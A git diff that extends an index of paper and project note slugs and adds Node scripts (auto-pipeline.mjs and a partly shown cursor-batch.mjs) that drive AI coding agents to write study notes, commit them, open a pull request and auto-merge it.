+ds-zero-pp-comm dspy dssm-2013 dstreams-2013 @@ -260,6 +275,7 @@ ducas-dilithium-2018 duchi-local-dp-2013 duckdb-2019 dwork-calibrating-noise-2006 +dwork-differential-privacy-2006 dwork-dp-icalp-2006 dwork-our-data-ourselves-2006 dynamo @@ -270,6 +286,7 @@ easycrypt-2011 ebpf edm-2022 effect-handlers +efficient-compile-2011 effiskill egoschema-2023 electra-2020 @@ -286,13 +303,16 @@ eve-agent-evidence evo-memory-2511 exg-experience-graphs exokernel-1995 +expertflow-moe-offload f1-2013 f4-2014 faiss-2017 fan-vercauteren-bfv-2012 +farm-2015 farsite-2002 fast-paxos-2006 fastertransformer-2021 +fastlanes-compression fat-tree-2008 feautrier-polyhedral fermi-architecture-2010 @@ -301,10 +321,13 @@ fidge-1988 fielding-rest-2000 filip-2021 firecracker-2020 +first-class-refinement-scala flamingo-2022 flan-2021 flash-attention flash-vstream-2024 +flashattention-2 +flashattention-3-2024 flexible-paxos-2016 flexsc-2010 flink-2015 @@ -377,10 +400,12 @@ hazard-pointers-2004 hdfs-2010 heartbleed-2014 heckbert-1986-texture-survey +hekaton helium-type-errors helland-2007 herlihy-moss-tm hewitt-actor-model +hexagent-agentic-scheduling hindley-milner hits-1999 hlc-2014 @@ -397,6 +422,7 @@ http-2 hu-2018-mls-mpm huffman-1952 hughes-fp-matters +hullft-ttft hydra-1974 hyperkernel-2017 ice-rfc-5245 @@ -452,10 +478,12 @@ koren-mf-2009 krishnamurthy-1999-http11 kubernetes-2016 kustomize +kv-fold kvm-2007 l4-1995 label-smoothing-2016 lafortune-1993-bdpt +lakehouse-2021 lalr-deremer lambda-calculus lambdarank-2006 @@ -463,6 +491,7 @@ lamport-1978 lamport-tla-1994 lampson-hints landin-secd +language-server-protocol-spec layernorm-2016 lean-prover lean-tactics @@ -470,10 +499,12 @@ lee-keystone-2020 leis-2015-optimizers lerner-seminal levoy-hanrahan-1996-light-field +lfm2-5-8b-a1b-moe lfs-1991 li-2018-redner li-t-closeness-2007 lieberman-realtime-gc +liger-kernel-llm-training lindholm-2008-tesla linear-scan-reg-alloc linear-types @@ -489,12 +520,15 @@ llava llava-onevision-2024 llava-video-2024 llm-int8-2022 +llm-serving-needs-math llm-wiki-retrieval-reasoning +llmsurgeon-data-mixture llmvs-2025 llvm lmdb-2011 local-type-inference locus-1980 +log4shell-cve-2021-44228 logjam-2015 logoot-2010 long-video-retrieval-2023 @@ -502,6 +536,7 @@ longformer-2020 longva-2024 longvideobench-2024 longvila-2024 +loong-doc-mt loop-1987-subdivision lottery-1994 lottery-ticket-2019 @@ -511,6 +546,7 @@ lstm-1997 lucky13-2013 lvbench-2024 mach-1986 +mach-rashid-1986 mach-vm-1987 machanavajjhala-l-diversity-2007 macklin-2014-position-based-fluids @@ -531,14 +567,19 @@ mccarthy-lisp mcfarling-bp-1993 mcmahan-fedavg-2017 mcmillan-smv-1993 +mcp-is-dead-debate mcp-spec mcs-locks-1991 meagher-1982-octree medusa-2024 megastore-2011 +megatron-core-moe-2026 megatron-lm +meltdown-attack-2018 +mem-ft-lora memcached-fb-2013 memcoder-co-evolution +memory-tool-use-agents mencius-2008 mermaid mesa-optimization-2019 @@ -556,6 +597,7 @@ minhash-broder-1997 minicpm-v-2024 minisat-2003 mips-1981 +mira-rubric mirage-2013 mironov-renyi-dp-2017 misevolution-2509 @@ -579,6 +621,7 @@ mogul-1995-persistent-http monaghan-1992-sph monetdb-x100-2005 monitors-1974 +morsel-driven-2014 moviechat-2024 mplug-owl-2023 mptcp-2012 @@ -595,12 +638,14 @@ narwhal-tusk-2022 nbeats-2020 nelson-oppen-1979 nerf-2020 +nestedkv netflix-bellkor-2009 netkat-2014 neumann-2015-large-joins neumf-2017 newcombe-2011-kinectfusion newsome-taintcheck-2005 +nexus-prefill-decode-intra-gpu nfs-1985 ngabonziza-trustzone-2016 nickolls-dally-2010-cuda-era @@ -608,6 +653,7 @@ nieuwenhuis-dpll-t-2006 nimier-david-2019-mitsuba2 nix no-silver-bullet +noise-protocol-framework ntk-2018 ntp-mills-1991 nuprl-1986 @@ -616,11 +662,14 @@ nvlink-nvswitch-2018 nvm nvme-protocol-2017 oauth-2.1-rfc +oauth2-rfc6749 okapi-bm25-1994 +oltp-looking-glass omagent-2024 omega-2013 omnidirectional-mllm-2025 omnistvg-2025 +on-demand-container-loading opencl-2010 openflow-2008 openhands @@ -628,10 +677,12 @@ opensearch optuna orca-2022 orca-continuous-batching +oscar-int2-kv ot-1989 owens-2007-gpgpu-survey p4-2014 padmanabhan-1995-http-latency +paged-attention-vllm pagerank-1998 pair-programming panel @@ -667,16 +718,19 @@ presumed-abort-1986 product-quantization-2011 program-comprehension-fmri programmer-interruption +projection-bench prolog-colmerauer prototypical-networks-2017 proverif-2001 ps-li-2014 push-pull-frp pypy-tracing-jit +qserve-w4a8kv4-2024 quantum-supremacy-2019 quic quincy-2009 qvhighlights-2021 +qwen-vla qwen2-5-vl-2025 qwen2-vl-2024 r-bgp-2007 @@ -684,6 +738,7 @@ rabin-ot-1981 raft rag-lewis-2020 ranknet-2005 +ray-2018 rcu-2001 react react-server-components @@ -695,14 +750,17 @@ refinement-types-1991 reflexion reformer-2020 regev-lwe-2005 +rendering-diffs replug-2023 reps-ifds resnet +resolution-diagnostics-llm rest-fielding-2000 retro reynolds-definitional-interpreters reynolds-separation-logic rfc-3833-dns-threats +rim-latent-reasoning ring-allreduce-2017 risc-i-1981 rlhf-christiano @@ -713,8 +771,10 @@ rocksdb-2017 rocksdb-lsm ron-2001 row-polymorphism-remy +rowhammer-2014 rrf-cormack-2009 rsa +rsa-1978 rtp-rfc-1889 rwkv-2023 sac-2018 @@ -752,6 +812,7 @@ sequel-1974 sequential-consistency-1979 server-sent-events sglang-2024 +sglang-radixattention sgx-2013 shannon-1948 sharegpt4video-2024 @@ -759,6 +820,8 @@ shellcheck shenango-2019 shokri-mia-2017 siglip-2023 +signal-double-ratchet-2016 +sigstore-cosign-2022 sillito-questions silt-2011 simhash-charikar-2002 @@ -786,6 +849,7 @@ soltesz-2007 sophia-2023 sorkine-2004-laplacian-editing souffle-datalog +soundness-bench spacevllm-2025 spann-2021 spanner @@ -793,10 +857,14 @@ spanner-2012 sparrow-2013 sparse-autoencoders sparsegpt-2023 +spec-agent-separation-logic specinfer-2023 +spectre-attack-2018 +speculative-decoding-leviathan-2023 splade-2021 sprite-1988 sqlite-2022 +sqlite-durable-workflows ssa st-llm-2024 stable-diffusion @@ -808,6 +876,7 @@ starrocks steensgaard-pointer stm-shavit-touitou stonebraker-2010-sqlnosql +storm-multi-agent-state streamingbench-2024 strongtalk stylegan2-2020 @@ -838,6 +907,7 @@ template-haskell tendermint-2016 tensorflow-osdi-2016 tensorrt-llm-2023 +tensorrt-llm-overview tesla-architecture-2008 the-os-1968 theorems-for-free @@ -848,6 +918,7 @@ timechat-2024 timelinejs timemarker-2024 tla-yu-tlc-1999 +tls-1-3-rfc8446 tls-1.3 tofte-talpin-regions token-bucket-stripe @@ -861,14 +932,18 @@ tracemonkey transformer-xl-2019 traveler-2024 tree-of-thoughts-2023 +tree-sitter-2018 trees-that-grow +triaxialkv trill-2014 triton-2019 +triton-anatomy-paged-attn triton-llm trustrank-2004 turchin-supercompilation turing-1936 turing-architecture-2018 +tutti-ssd-kv-cache tvm tvm-2018 twine-2020 @@ -884,9 +959,13 @@ veach-1995-mis veach-1997-mlt vega-lite vellvm +velox-meta-2022 verdi-2015 +vericache verisoft-2008 vertica-2012 +vescale-fsdp-2026 +vibeserve vid-llm-survey-2023 video-chatgpt-2023 video-llama-2023 @@ -902,6 +981,7 @@ videomme-2024 videoprism-2024 vidstg-2020 vinoground-2024 +visualthink-vla vit vl2-2009 vllm @@ -923,6 +1003,8 @@ wam-warren wandb wang-2014-spdy ward-1992 +wco-joins-relational-2020 +webauthn-fido2 websocket-rfc-6455 webxskill whisper-2022 @@ -931,6 +1013,7 @@ why3-2013 wide-deep-2016 williams-1983-mipmap wireguard-2017 +wisckey word2vec world-model-robot-learning-2026 worldsense-2025 @@ -939,6 +1022,7 @@ xla-compiler xlnet-2019 xtrace-2007 yao-garbled-circuits-1986 +yocto-alternatives youtube-two-tower-2019 z3-2008 zab-2011 @@ -946,6 +1030,7 @@ zero-2020 zfs-2003 zgc zk-snark +zk-snark-pinocchio-2013 zombie-agents-2602 # projects @@ -959,6 +1044,7 @@ affine ag-grid age aichat +aider aiortc airflow altair @@ -974,9 +1060,11 @@ antv-f2 antv-g2 antv-g6 antv-x6 +anytype-ts ape-framework apexcharts apollo-server +appflowy appwrite aptos-core aragon @@ -994,6 +1082,7 @@ arrow-rs arweave asdf aspnetcore +assimp ast-grep asterisk astro @@ -1026,10 +1115,14 @@ bigbluebutton billboard-js biome bitcoin-core +blender +boa-engine bokeh +bookstack botbuilder-js botpress bottom +box2d boxen broot browser-use @@ -1038,6 +1131,7 @@ bubbletea buildah buildkit buildroot +bullet bullmq bun caddy @@ -1045,6 +1139,7 @@ cairo-lang cal-com calico candle +cannon-es canvas-datagrid capacitor capnproto @@ -1072,10 +1167,14 @@ claude-code clearml clerk clickhouse +cline +cmsis-nn cockroach cockroachdb cocos2d-x +code-server codemirror +coder collabora-online colmap colossal-ai @@ -1115,6 +1214,7 @@ dav1d dayjs dbt-core debezium +deck-gl decord deepspeed defold @@ -1136,9 +1236,11 @@ docusaurus doom-emacs doris dovecot +draco dragonfly drawio drizzle +drizzle-orm drone dropwizard druid @@ -1152,12 +1254,14 @@ dvc earthly echarts echo +eclipse-che edgedb effect ejabberd elasticsearch electron electron-builder +electron-forge element-android element-web elysia @@ -1172,8 +1276,12 @@ envoy erigon errbot esbuild +esp-dl +esphome +espurna essentia etcd +etherpad-lite ethers-js evidence excalidraw @@ -1191,18 +1299,24 @@ fdk-aac feast ferretdb ffmpeg +ffmpeg-kit fiber filament filecoin fish fish-shell flac +flame flask flax flowchart-js fluent-bit flutter +flutter-quill +flutter-rust-bridge +flutterfire flux +foam fooocus foundry framer-motion @@ -1210,19 +1324,27 @@ frappe-gantt freemodbus freertos freeswitch +fvm fx fzf +gazebo-classic gdu geany gh +ghostwriter gin github-actions +gitpod gitui glab glances glide-data-grid +glsl-canvas +glslify +gltf-transform go-ethereum go-zero +godot got gqlgen gradio @@ -1231,6 +1353,7 @@ grafana-tempo grape graphology graphql-yoga +grbl greenplum-db gron grpc-go @@ -1246,6 +1369,7 @@ haraka hardhat haystack heaps +hedgedoc helidon helix helm @@ -1253,17 +1377,20 @@ hls.js hnswlib hocuspocus holoviews +home-assistant homebrew hono hot-chocolate htop httpie +hydra-synth i18next imagemagick immer immich influxdb ink +inkscape inngest insightface internvideo @@ -1282,10 +1409,13 @@ jest jimp jitsi-meet jitsi-videobridge +joplin jotai jq js-joda jspdf +jupyter-notebook +jupyterlab just k3s k6 @@ -1299,11 +1429,13 @@ kepler-gl keras kind kitty +klipper koa kong konva krakend kratos +krita ktor kubebuilder kubectx @@ -1341,11 +1473,13 @@ lightningcss lima lingui linkerd2 +linuxcnc listr2 lite-xl litellm-proxy litestar litmus +littlefs liveblocks livekit livekit-flutter @@ -1359,12 +1493,15 @@ lmms lmms-eval locust lodestar +logseq loki longhorn +lora-mac-node lottie love2d lsd lucia +luma-gl lunarvim luxon lwip @@ -1376,11 +1513,15 @@ manticoresearch mapbox-gl-js maplibre-gl mariadb-server +marimo markdown-it marked +marktext +marlin matplotlib matrix-js-sdk matrix-rust-sdk +matter-js mattermost mbedtls mcp-ts-sdk @@ -1391,6 +1532,7 @@ meilisearch melonjs memcached memgraph +mender mermaid meshroom metabase @@ -1419,18 +1561,25 @@ monaco-editor monero mongo mongodb +mosquitto motion-one move-language +moveit2 msw mumble mysql mysql-server nanobrowser +nanomq nanostores +native-base nativescript +nativewind nats nats-server +navigation2 ncdu +ncnn nebula neo4j neovim @@ -1471,7 +1620,9 @@ oh-my-posh ollama open-sora openai-agents-sdk +opencode opencv +openhab openlayers openmeetings openrct2 @@ -1479,9 +1630,11 @@ opensea-js opensearch opentelemetry opentelemetry-collector +openthread opentofu opentsdb openvidu +openvscode-server openwrt openzeppelin-contracts operator-sdk @@ -1491,8 +1644,11 @@ opus ora orleans otel-collector +outline ovenmediaengine +overleaf oxc +paddle-lite paddleocr panda3d pandas @@ -1509,12 +1665,14 @@ pg-boss-readme pgvector phaser phoenix +picogl pillow pino pinot pion piper pixi +planck plane platformio-core playcanvas @@ -1523,6 +1681,7 @@ plotly-js plotly-py plotnine plug +pluto-jl pnpm pocketbase podman @@ -1549,6 +1708,7 @@ pulsar pulumi pyarrow pyenv +pyston pyth pytorch pytorch-lightning @@ -1564,8 +1724,10 @@ rabby-wallet radix-ui rails ranger +rapier rasa ratatui +rauc ravendb ray raylib @@ -1575,11 +1737,16 @@ react-flow react-hook-form react-intl react-native +react-native-macos +react-native-paper +react-native-web +react-native-windows react-spring recharts redash redis redpanda +regl remix remix-ide reservoir-sdk @@ -1592,7 +1759,9 @@ rocket-chat rocksdb rolldown rollup +roo-code rook +ros2 rspack rt-thread runc @@ -1606,12 +1775,15 @@ scoop scrcpy scroll sd +sdk-nrf seaborn sealed-secrets sentry sequelize sglang shadcn-ui +shader-park +shadowsocks-libev shaka-packager shaka-player shap @@ -1630,8 +1802,10 @@ signal-ios signal-server signoz silero-vad +silverbullet simple-peer sinatra +siyuan skaffold sled slim-framework @@ -1646,6 +1820,7 @@ sops sortablejs sox spacemacs +spectorjs spin spring-boot sqlite @@ -1679,6 +1854,7 @@ symfony synapse tabulator tailwind +tamagui tanstack-form tanstack-query tanstack-router @@ -1694,9 +1870,12 @@ temporal-polyfill tensorflow terraform testing-library +texstudio textmate textual +tflite-micro the-silver-searcher +theia thirdweb-sdk threejs thrift @@ -1707,17 +1886,20 @@ tikv tilt timelinejs timescaledb +tinygo tldraw tmux torchcodec torchtune traefik transformers-video +trilium triton-inference-server trl trpc turbopack turborepo +twgl twirp tyk typeorm @@ -1726,6 +1908,7 @@ ultralytics unified uniswap-v3 universal-ctags +unqlite unsloth unstorage unstructured @@ -1758,6 +1941,7 @@ vitest vllm vllm-multimodal vodozemac +void voila volta vscode @@ -1772,11 +1956,13 @@ wasmtime weaviate web-vitals web3-js +webdriverio webpack webrtc-rs wezterm whisper why-did-you-render +wireguard-go woodpecker wormhole wretch @@ -1798,6 +1984,8 @@ zcash zed zellij zephyr +zeppelin +zettlr zincsearch zksync-era zod diff --git a/scripts/auto-pipeline.mjs b/scripts/auto-pipeline.mjs new file mode 100644 index 000000000..680c09425 --- /dev/null +++ b/scripts/auto-pipeline.mjs @@ -0,0 +1,405 @@ +#!/usr/bin/env node +// auto-pipeline.mjs — 全自动研究→写笔记→审→commit→PR→merge 编排器 +// +// 用法:node scripts/auto-pipeline.mjs +// 环境变量: +// BATCHES_PER_ROUND=10 每轮跑多少批(默认10) +// AUTO_MERGE=true 是否自动 merge PR(默认 true) +// DRY_RUN=true 只写不提交(调试用) + +import { execSync, spawn } from 'node:child_process'; +import fs from 'node:fs'; +import path from 'node:path'; +import { fileURLToPath } from 'node:url'; + +const __dirname = path.dirname(fileURLToPath(import.meta.url)); +const ROOT = path.resolve(__dirname, '..'); +const CANDIDATES = path.join(ROOT, 'data', 'candidates.jsonl'); +const PROJECTS = path.join(ROOT, 'src', 'content', 'docs', 'projects'); +const PAPERS = path.join(ROOT, 'src', 'content', 'docs', 'papers'); + +const BATCHES_PER_ROUND = parseInt(process.env.BATCHES_PER_ROUND || '10', 10); +const BATCH_SIZE = 40; +const AUTO_MERGE = process.env.AUTO_MERGE !== 'false'; +const DRY_RUN = process.env.DRY_RUN === 'true'; + +// ── helpers ── + +function log(msg) { console.log(`[${new Date().toISOString().slice(11, 19)}] ${msg}`); } + +function sh(cmd, opts = {}) { + try { + return execSync(cmd, { cwd: ROOT, encoding: 'utf8', ...opts }).trim(); + } catch (e) { + if (!opts.ignoreError) throw e; + return ''; + } +} + +function readJsonl(p) { + const raw = fs.readFileSync(p, 'utf8'); + return raw.split('\n').filter(Boolean).map(l => { + try { return JSON.parse(l); } catch { return null; } + }).filter(Boolean); +} + +function noteCount() { + const p = fs.readdirSync(PROJECTS).filter(f => f.endsWith('.md')).length; + const pa = fs.readdirSync(PAPERS).filter(f => f.endsWith('.md')).length; + return { projects: p, papers: pa, total: p + pa }; +} + +function poolStats() { + const lines = readJsonl(CANDIDATES); + const q = lines.filter(l => l.status === 'queued'); + return { queued: q.length, projects: q.filter(l => l.area === 'projects').length, papers: q.filter(l => l.area === 'papers').length }; +} + +// ── quality gate ── + +function runQualityGate() { + log('Running quality gate (recent files only)...'); + const counts = noteCount(); + const now = Date.now(); + const MAX_AGE = 30 * 60 * 1000; // 30 minutes + + const issues = []; + let checked = 0; + for (const dir of [PROJECTS, PAPERS]) { + for (const f of fs.readdirSync(dir).filter(f => f.endsWith('.md'))) { + const fp = path.join(dir, f); + const stat = fs.statSync(fp); + if (now - stat.mtimeMs > MAX_AGE) continue; // skip old files + checked++; + const content = fs.readFileSync(fp, 'utf8'); + const lines = content.split('\n').length; + if (lines < 100) issues.push(`${f}: ${lines} lines (min 100)`); + if (!/^分类:\s*.+$/m.test(content)) issues.push(`${f}: missing 分类`); + if (!/^来源/m.test(content)) issues.push(`${f}: missing 来源`); + } + } + + const shortNotes = issues.filter(i => i.includes('lines')); + const structuralIssues = issues.filter(i => !i.includes('lines')); + + log(` Total: ${counts.total} | Recent checked: ${checked} | Short: ${shortNotes.length} | Structural: ${structuralIssues.length}`); + + return { + pass: shortNotes.length === 0 && structuralIssues.length < 10, + counts, + issues: issues.slice(0, 10), + }; +} + +// ── pool expansion (opencode agnes, background) ── + +function spawnExpander(label, prompt) { + const child = spawn('opencode', ['run', '-m', 'agnes/agnes-2.0-flash', '--print-logs', prompt], { + cwd: ROOT, + stdio: ['ignore', 'pipe', 'pipe'], + timeout: 600000, + }); + child.stdout.on('data', () => {}); + child.stderr.on('data', () => {}); + child.on('close', code => { + log(`Expander ${label}: exit ${code}`); + }); + return child; +} + +function expandProjects() { + log('Expanding projects pool (opencode)...'); + return spawnExpander('projects', + `扩充候选池。Read data/candidates.jsonl,Edit追加50+热门开源项目(AI infra/云原生/安全/数据库/DevOps方向,star>1000)。JSONL格式追加。不用/tmp。直接执行。` + ); +} + +function expandPapers() { + log('Expanding papers pool (opencode)...'); + return spawnExpander('papers', + `扩充论文候选池。Read data/candidates.jsonl,Edit追加50+篇热门论文(ML/系统/分布式/安全方向2024-2026)。JSONL格式追加。不用/tmp。直接执行。` + ); +} + +// ── batch writing (opencode agnes) ── + +function dispatchWriter(slug, area, title, url) { + return new Promise((resolve) => { + const dir = area === 'papers' ? 'papers' : 'projects'; + const outPath = `src/content/docs/${dir}/${slug}.md`; + const prompt = `写一篇关于 ${title || slug} 的零基础学习笔记,用 Write 工具保存到 ${outPath}。 +frontmatter 必须含 title、来源:${url||''}、日期:2026-06-13、分类、子分类、provenance:pipeline-v3。 +正文从日常类比开始,必须含核心概念+至少2个代码示例,目标150+行。 +用 web_search 研究后直接用 Write 写完整笔记。不要用 /tmp。`; + + const child = spawn('opencode', [ + 'run', '-m', 'agnes/agnes-2.0-flash', + '--print-logs', prompt + ], { + cwd: ROOT, + stdio: ['ignore', 'pipe', 'pipe'], + timeout: 300000, + }); + + let stdout = ''; + child.stdout.on('data', (d) => { stdout += d.toString(); }); + child.stderr.on('data', () => {}); + + child.on('close', (code) => { + resolve({ slug, area, exitCode: code }); + }); + child.on('error', (err) => { + resolve({ slug, area, exitCode: -1, error: err.message }); + }); + }); +} + +function claimSlug(slug) { + const p = `/tmp/cursor-claim-${slug}`; + if (fs.existsSync(p)) return false; + try { fs.writeFileSync(p, String(process.pid), { flag: 'wx' }); return true; } catch { return false; } +} +function releaseClaim(slug) { try { fs.unlinkSync(`/tmp/cursor-claim-${slug}`); } catch {} } + +function pickBatch() { + try { + const result = sh(`node scripts/pick-batch.mjs --count ${BATCH_SIZE} --rewrite 0 --new ${BATCH_SIZE}`, { maxBuffer: 10 * 1024 * 1024 }); + return JSON.parse(result).items || []; + } catch (e) { + log(` pick-batch error: ${e.message?.slice(0, 80)}`); + return []; + } +} + +function fileExists(slug, area) { + const dir = area === 'papers' ? PAPERS : PROJECTS; + return fs.existsSync(path.join(dir, `${slug}.md`)); +} + +async function runBatch(batchNum) { + const items = pickBatch(); + const toWrite = []; + for (const item of items) { + if (fileExists(item.slug, item.area)) continue; + if (!claimSlug(item.slug)) continue; + toWrite.push(item); + } + + if (toWrite.length === 0) { + log(` Batch ${batchNum}: no candidates available`); + return 0; + } + + log(` Batch ${batchNum}: dispatching ${toWrite.length} opencode writers...`); + const results = await Promise.all(toWrite.map(i => + dispatchWriter(i.slug, i.area, i.title || i.slug, i.url || '') + )); + + let ok = 0; + for (const r of results) { + releaseClaim(r.slug); + const fp = path.join(r.area === 'papers' ? PAPERS : PROJECTS, `${r.slug}.md`); + if (fs.existsSync(fp)) { + // Update candidate status + try { + const candidates = readJsonl(CANDIDATES); + for (const c of candidates) { + if (c.slug === r.slug && c.area === r.area && c.status === 'queued') { + c.status = 'written'; + c.written_at = new Date().toISOString(); + } + } + fs.writeFileSync(CANDIDATES, candidates.map(c => JSON.stringify(c)).join('\n') + '\n'); + } catch {} + ok++; + } + } + + // Run classify + try { sh('node scripts/classify-notes.mjs --apply --area=projects', { ignoreError: true }); } catch {} + try { sh('node scripts/classify-notes.mjs --apply --area=papers', { ignoreError: true }); } catch {} + + return ok; +} + +// ── commit & PR ── + +function commitRound(roundNum) { + if (DRY_RUN) { log(` [DRY RUN] Would commit round ${roundNum}`); return; } + + log(` Committing round ${roundNum}...`); + + // Add all new/modified content files + const newFiles = sh('git status --short', { ignoreError: true }) + .split('\n').filter(l => l.startsWith('??') || l.startsWith(' M') || l.startsWith('MM')) + .map(l => l.slice(3).trim()) + .filter(f => f.startsWith('src/content/docs/') || f.startsWith('data/') || f.startsWith('scripts/cursor')); + + if (newFiles.length === 0) { log(' Nothing to commit'); return false; } + + for (const f of newFiles) { + try { sh(`git add "${f}"`, { ignoreError: true }); } catch {} + } + + const counts = noteCount(); + const msg = `auto: 第 ${roundNum} 轮批量笔记 — cursor-agent + opencode 自动流水线(${counts.total} 篇)`; + try { + sh(`git commit -m "${msg}"`, { ignoreError: true }); + log(` Committed: ${newFiles.length} files`); + return true; + } catch { + return false; + } +} + +function pushAndPR(roundNum) { + if (DRY_RUN) { log(` [DRY RUN] Would push + PR for round ${roundNum}`); return; } + + const branch = sh('git branch --show-current'); + log(` Pushing ${branch}...`); + + try { + sh(`git push origin ${branch}`, { ignoreError: true }); + } catch { + log(' Push failed, skipping PR'); + return; + } + + // Check if PR already exists + const existingPR = sh(`gh pr list --head ${branch} --json number --jq '.[0].number'`, { ignoreError: true }); + if (existingPR) { + log(` PR #${existingPR} already exists`); + return existingPR; + } + + // Create PR + const counts = noteCount(); + const body = `自动流水线第 ${roundNum} 轮\n\n- cursor-agent (composer-2.5) 批量生成\n- opencode (agnes-2.0) 候选池扩展\n- 当前总量:${counts.total} 篇(projects ${counts.projects} + papers ${counts.papers})\n\n🤖 Generated with [Claude Code](https://claude.com/claude-code)`; + try { + const prUrl = sh(`gh pr create --title "auto: 第 ${roundNum} 轮批量笔记(${counts.total} 篇)" --body "${body}" --base main`); + log(` PR created: ${prUrl}`); + const prNum = prUrl.split('/').pop(); + return prNum; + } catch (e) { + log(` PR creation failed: ${e.message}`); + return null; + } +} + +function autoMergePR(prNum) { + if (!AUTO_MERGE || !prNum) return; + if (DRY_RUN) { log(` [DRY RUN] Would merge PR #${prNum}`); return; } + + log(` Auto-merging PR #${prNum}...`); + + // Wait for CI to start (GitHub Pages deploy check) + const shas = sh(`gh pr view ${prNum} --json commits --jq '.commits[].oid'`, { ignoreError: true }); + log(` PR commits: ${shas?.slice(0, 40)}`); + + try { + // Enable auto-merge if available, otherwise direct merge + sh(`gh pr merge ${prNum} --squash --delete-branch --auto`, { ignoreError: true }); + log(` Auto-merge enabled for PR #${prNum}`); + } catch { + // Fallback: merge directly if checks pass + try { + sh(`gh pr merge ${prNum} --squash --delete-branch`, { ignoreError: true }); + log(` Merged PR #${prNum}`); + } catch { + log(` Merge failed for PR #${prNum} — check CI status`); + } + } +} + +// ── main orchestrator ── + +async function main() { + log('=== Auto Pipeline Started ==='); + const initial = noteCount(); + log(`Initial: ${initial.total} notes (${initial.projects} projects + ${initial.papers} papers)`); + log(`Config: ${BATCHES_PER_ROUND} batches/round, batch_size=${BATCH_SIZE}, auto_merge=${AUTO_MERGE}, dry_run=${DRY_RUN}`); + log(''); + + let totalWritten = 0; + let roundNum = 1; + let prNum = null; + + // Start pool expanders (persistent background) + let projectsExpander = null; + let papersExpander = null; + + // eslint-disable-next-line no-constant-condition + while (true) { + log(`=== Round ${roundNum} ===`); + + // 1. Repair JSONL (skip corrupted lines) + try { + const raw = fs.readFileSync(CANDIDATES, 'utf8'); + const lines = raw.split('\n').filter(Boolean); + const clean = lines.filter(l => { try { JSON.parse(l); return true; } catch { return false; } }); + if (clean.length < lines.length) { + fs.writeFileSync(CANDIDATES, clean.join('\n') + '\n'); + log(` Repaired candidates.jsonl: removed ${lines.length - clean.length} corrupted lines`); + } + } catch {} + + // 2. Expand pool — launch 8 expanders per round (4 projects + 4 papers, 50+ each) + log(' Launching 8 pool expanders (opencode agnes, 50+ each)...'); + for (let i = 0; i < 4; i++) expandProjects(); + for (let i = 0; i < 4; i++) expandPapers(); + + // 2. Write batches + let roundWritten = 0; + for (let b = 1; b <= BATCHES_PER_ROUND; b++) { + const written = await runBatch(b); + roundWritten += written; + } + totalWritten += roundWritten; + log(` Round ${roundNum}: wrote ${roundWritten} notes`); + + // 3. Quality gate + const quality = runQualityGate(); + if (!quality.pass) { + log(` Quality gate FAILED — skipping commit`); + log(` Issues: ${quality.issues.map(i => ' ' + i).join('\n')}`); + roundNum++; + continue; + } + + // 4. Commit + const committed = commitRound(roundNum); + if (!committed) { roundNum++; continue; } + + // 5. Push + PR (create on first round, update on subsequent) + if (roundNum === 1 || !prNum) { + prNum = pushAndPR(roundNum); + } else { + try { sh(`git push origin ${sh('git branch --show-current')}`, { ignoreError: true }); } catch {} + log(` Pushed to existing PR #${prNum}`); + } + + // 6. Auto-merge every 3 rounds + if (roundNum % 3 === 0 && prNum) { + autoMergePR(prNum); + prNum = null; + } + + // Status update + const counts = noteCount(); + const pool = poolStats(); + log(`Status: ${counts.total} notes | pool: ${pool.queued} | round: ${roundNum} | written: ${totalWritten}`); + + roundNum++; + + // Exit condition + if (pool.queued < BATCH_SIZE) { + log('Pool exhausted, waiting for expanders...'); + await new Promise(r => setTimeout(r, 60000)); + } + } +} + +main().catch(err => { + console.error('Pipeline crashed:', err); + process.exit(1); +}); diff --git a/scripts/classify-notes.mjs b/scripts/classify-notes.mjs index 47fcad5ce..2832063e5 100644 --- a/scripts/classify-notes.mjs +++ b/scripts/classify-notes.mjs @@ -13,9 +13,13 @@ import { loadCandidates, parseFrontmatter, classifySlug, + scoreItem, normalizeRawCategory, } from './taxonomy-lib.mjs'; +// Re-export for pipeline / test consumers: scoreItem({ slug, area, fm?, candidate? }) +export { scoreItem, classifySlug, loadTaxonomy, parseFrontmatter }; + const AREAS = ['papers', 'projects']; function upsertFmLine(block, key, value) { diff --git a/scripts/cursor-batch.mjs b/scripts/cursor-batch.mjs new file mode 100644 index 000000000..8e41e411e --- /dev/null +++ b/scripts/cursor-batch.mjs @@ -0,0 +1,230 @@ +#!/usr/bin/env node +// cursor-batch.mjs — 用 cursor-agent 批量写笔记的安全循环 +// 用法:node scripts/cursor-batch.mjs [批次数] [每批篇数] +// 默认跑 10 批,每批 4 篇 = 40 篇 + +import { execSync, spawn } from 'node:child_process'; +import fs from 'node:fs'; +import path from 'node:path'; +import { fileURLToPath } from 'node:url'; + +const __dirname = path.dirname(fileURLToPath(import.meta.url)); +const ROOT = path.resolve(__dirname, '..'); +const CANDIDATES_PATH = path.join(ROOT, 'data', 'candidates.jsonl'); +const PROJECTS_DIR = path.join(ROOT, 'src', 'content', 'docs', 'projects'); +const PAPERS_DIR = path.join(ROOT, 'src', 'content', 'docs', 'papers'); +const CURSOR_BIN = '/Users/jason/.local/bin/cursor-agent'; +const MODEL = 'composer-2.5'; + +const BATCHES = parseInt(process.argv[2] || '10', 10); +const COUNT = parseInt(process.argv[3] || '4', 10); + +function readJsonl(p) { + const raw = fs.readFileSync(p, 'utf8'); + return raw.split('\n').filter(Boolean).map(l => { + try { return JSON.parse(l); } catch { return null; } + }).filter(Boolean); +} + +function writeJsonl(p, rows) { + const body = rows.map(r => JSON.stringify(r)).join('\n') + (rows.length ? '\n' : ''); + fs.writeFileSync(p, body, 'utf8'); +} + +function fileExists(slug, area) { + const dir = area === 'papers' ? PAPERS_DIR : PROJECTS_DIR; + return fs.existsSync(path.join(dir, `${slug}.md`)); +} + +function claimSlug(slug) { + // Atomic claim via tmpfile — prevents duplicate dispatch across parallel instances + const claimPath = `/tmp/cursor-claim-${slug}`; + if (fs.existsSync(claimPath)) return false; + try { + fs.writeFileSync(claimPath, String(process.pid), { flag: 'wx' }); + return true; + } catch { + return false; + } +} + +function releaseClaim(slug) { + try { fs.unlinkSync(`/tmp/cursor-claim-${slug}`); } catch {} +} + +function pickBatch() { + try { + const result = execSync(`node scripts/pick-batch.mjs --count ${COUNT} --rewrite 0 --new ${COUNT}`, { cwd: ROOT, encoding: 'utf8' }); + const json = JSON.parse(result); + return json.items || []; + } catch (e) { + console.error('pick-batch failed:', e.message); + return []; + } +} + +function dispatchCursorAgent(slug, area, title, url) { + return new Promise((resolve) => { + const dir = area === 'papers' ? 'papers' : 'projects'; + const prompt = `写一篇关于 ${title || slug} 